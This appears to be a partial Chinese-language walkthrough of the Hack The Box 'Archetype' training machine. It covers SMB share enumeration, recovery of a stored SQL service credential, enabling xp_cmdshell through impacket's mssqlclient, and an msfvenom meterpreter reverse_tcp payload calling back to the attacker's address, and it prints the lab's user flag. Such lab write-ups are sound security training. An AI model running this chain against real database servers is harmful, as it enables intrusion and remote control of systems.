Hackthebox Archetype攻略(部分)
目标:Archetype
题目难度:本人觉得有难度
作者使用Kali Linux作为渗透测试平台,在Kali Linux上首先通过openvpn建立与Hackthebox网站的VPN连接,得到目标Archetype实例的IP地址:
#openvpn starting_point_jasonhuawen.ovpn
# nmap -sV 10.129.5.176
用nmap工具扫描一下目标Archetype,看数据库服务运行的端口即可:
从nmap扫描结果可以知道目标运行共享服务,因此尝试用smbclient列出共享目录
# smbclient -L 10.129.5.176可以列出共享目录,以$结尾的是管理员权限
然后用smbclient登录上目标的backups目录
#smbclient //10.129.5.176/backups
发现只有一个文件,下载到本地,查看,就可以看到有有用户名和密码信息:
Username: ARCHETYPE\sql_svc
Password: M3g4c0rp123
接下来这道题,题目中提到了impacket工具,结果发现Kali Linux上没有安装,谷歌一下,安装很简单:
#git clone https://github.com/CoreSecurity/impacket.git
#cd impacket/
#python3 setup.py install
题目中是要建立与Microsoft SQL Server的连接,应该是mssqlclient.py脚本
接下来利用impacket中msclient.py脚本连接sqlserver 数据库(用户名与密码用之前smbclient下载的文件中的相关信息)
#python3 mssqlclient.py ARCHETYPE/sql_svc@10.129.5.176 -windows-auth
成功进入数据库
SQL> enable_xp_cmdshell;
SQL> reconfigure
然后是设法建立反向代理连接,需要将载荷生成并上传到目标机器,首先用msfenom生成载荷:
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.218 -f exe -o jason.exe
下面关键是如何把jason.exe payload上传到目标机器
可以利用xp_cmsshell执行命令,将载荷下载到目标机器,在kali Linux上运行http服务器(用python http模块)
首先在目标机器上进入到有执行权限的目录,比如Public目录:
成功上传载荷到目标机器:
然后在目标机器上执行脚本jason.exe
成功回连至Kali LInux
然后需要准备提权工具winPEAS,将该文件下载到Kali Linux本地
#wgethttps://github.com/carlospolop/PEASS-ng/releases/download/20220320/winPEASx86.exe
然后通过meterpreter将winpeas上传到目标机器,并执行:
成功获得user的flag: 3e7b102e78218e935bf3f4951fec21a3